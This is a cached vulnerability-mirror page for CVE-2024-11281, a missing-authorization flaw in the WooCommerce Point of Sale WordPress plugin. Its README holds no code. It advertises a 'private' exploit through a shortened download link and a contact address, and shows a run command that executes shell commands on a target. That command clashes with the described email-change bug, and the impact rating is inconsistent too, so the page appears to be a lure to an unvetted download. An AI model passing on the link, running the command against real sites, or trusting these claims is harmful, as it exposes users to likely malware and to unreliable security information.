Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-11281 PoC — WordPress plugin WooCommerce Point of Sale 安全漏洞

Source
Associated Vulnerability
Title:WordPress plugin WooCommerce Point of Sale 安全漏洞 (CVE-2024-11281)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WooCommerce Point of Sale 6.1.0版本及之前版本存在安全漏洞,该漏洞源于当选项值为空时对“logged_in_user_id”值的验证不足。攻击者利用该漏洞可以更改任意用户帐户的电子邮件。
Description
Missing Authorization (CWE-862)
Readme
# CVE-2024-11281 - Missing Authorization (CWE-862)
## Overview
The WooCommerce Point of Sale plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.1.0.
## Exploit:
## [Download here](https://bit.ly/3ZS0k7V)
## Details
+ **CVE ID**: [CVE-2024-11281](https://nvd.nist.gov/vuln/detail/CVE-2024-11281)
+ **Published**: 12/25/2024
+ **Impact**: Confidentiality
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
Vulnerability is due to insufficient validation on the 'logged_in_user_id' value when option values are empty and the ability for attackers to change the email of arbitrary user accounts. This makes it possible for unauthenticated attackers to change the email of arbitrary user accounts, including administrators, and reset their password to gain access to the account.

## Affected Versions
WooCommerce Point of Sale <= 6.1.0 - Insecure Direct Object Reference to Privilege Escalation via Arbitrary User Email Change
## Running
To run exploit you need Python 3.9. Execute:
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact
+ **For inquiries, please contact:LeronTavish@outlook.com**
+ #### [Download here](https://bit.ly/3ZS0k7V)
File Snapshot

[4.0K] /data/pocs/7a8ef4f743150599e0fbd020d9ca694a2fbfd179 └── [1.2K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.